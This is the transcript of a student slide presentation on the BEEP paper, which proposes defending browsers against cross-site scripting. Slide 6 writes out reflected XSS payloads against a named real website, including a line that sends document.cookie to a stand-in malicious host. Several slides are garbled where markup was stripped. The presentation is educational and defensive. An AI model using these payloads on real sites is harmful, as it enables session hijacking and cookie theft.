Defeating Script Injection Attacks with BrowserEnforced Embedded Policies - PowerPoint PPT Presentation

1 / 16
About This Presentation
Title:

Defeating Script Injection Attacks with BrowserEnforced Embedded Policies

Description:

Nikhil Swamy and Michael Hicks- University of Maryland, College Park ... img src='javascript:[code]' img dynsrc='javascript:[code] ... – PowerPoint PPT presentation

Number of Views:116
Avg rating:3.0/5.0
Slides: 17
Provided by: cse6
Category:

less

Transcript and Presenter's Notes

Title: Defeating Script Injection Attacks with BrowserEnforced Embedded Policies


1
Defeating Script Injection Attacks with
Browser-Enforced Embedded Policies
  • By
  • Trevor Jim- ATT Labs Research
  • Nikhil Swamy and Michael Hicks- University of
    Maryland, College Park
  • Presented by Lauri Marc Ahlman

2
Itinerary
  • Explanation and Overview of Cross-Site Scripting
    Attacks (XSS)?
  • Examples
  • Demonstration
  • Solution Proposed by Authors
  • What it is
  • How it works
  • Different Policies
  • Implementation

3
Cross Site Scripting
  • Typical (simplified) web application login
    scenario
  • User sends username and password to server
  • Server authenticates user, sends back cookie
  • Values stored in cookie are then the only
    authentication tokens used for the remainder of
    the session.
  • If an attacker can capture a user's cookie, that
    user's session is vulnerable to being hijacked
  • Cross Site Scripting can be used to steal the
    cookie!

4
Cross Site Scripting
  • A cross site scripting attack occurs when a third
    party injects a script into a trusted page, and
    that script is run in the user's browser.
  • There are two main types of XSS attack
  • -Reflected (Non-persistent) attacks
  • -Persistent attacks

5
Reflected (Non-persistent) Cross Site Scripting
Attacks
  • A website is vulnerable to a reflected XSS attack
    when it embeds part of the url into the page
    without filtering the content
  • The script is injected into the page served to
    the user, but is not stored on the server
  • Popular in when used with phishing
    attacksDemonstration

6
Scripts used
  • http//www.e-flux.com/search?keyword
  • 3C/b3E3Cscript3Ealert(22This20is20a20test
    22)
  • 3C/script3E3Cb3Eart
  • alert(This is a test)
  • http//www.e-flux.com/search?keyword
  • 3C/b3E3Cscript3Ealert28document.cookie29
  • 3C/script3E3Cb3Eart
  • alert(document.cookie)
  • document.location.replace('http//maliciou
    s-server.com/cookie_monster.cgi?'document.cookie)

7
Persistent Cross Site Scripting Attacks
  • A persistent cross site scripting attack stores
    the script on the server
  • Often used on forums, message boards, and other
    content management systems where users post data
    that is served to other users.Demonstration

8
Other Methods of Preventing XSS Attacks
  • Escape encoding
  • Encoding as lt and gt would prevent
    people from creating rich content using other
    html tags
  • Detecting scripts
  • Very difficult due to the wide variety of methods
    to invoke a script

9
Invoking a Script
  • code
  • code
  • code"
  • ptcode"
  • )"

10
Browser Enforced Embedded Policies (BEEP)?
  • Method suggested by authors of paper
  • Relies on two basic principles
  • Web developer knows what scripts should be run
    from website
  • Browser detects all scripts that will be run when
    it parses the page, if it is not detected by
    browser, it cannot be run
  • Implemented on web page by developer, as well as
    in browser on client side

11
Browser Enforced Embedded Policies (BEEP)?
  • Makes use of Security Hook function in web page
  • -Script executed first by the browser
  • -Located in the head of the html file
  • Every time a script is encountered in the page,
    the security hook is invoked, and it's policy
    applied.
  • The authors suggest two distinct policies to be
    used
  • -Whitelist
  • -DOM Sandboxing

12
Whitelist Policy
  • Hook function includes MD of every script on page
  • When the browser encounters a script, browser
    calculates the MD of the script, and hook
    compares to the saved Mds.
  • If there is a match, the script is executed,
    otherwise it is not.
  • The authors used SHA-1 for hashing

13
DOM Sandboxing
  • Black list approach
  • Instead of designating which scripts should be
    run, designates dangerous sections of the code
  • Designates sections of the code as non-executable

14
Client Side Implementation
  • The authors were able to modify Three browsers
    with relative ease
  • Konqueror
  • 650 lines of code
  • Safari
  • 650 lines of code
  • Opera
  • 79 lines of code
  • Also added a SHA-1 implementation to each

15
Questions???
16
  • Thank you very much.
Write a Comment
User Comments (0)
About PowerShow.com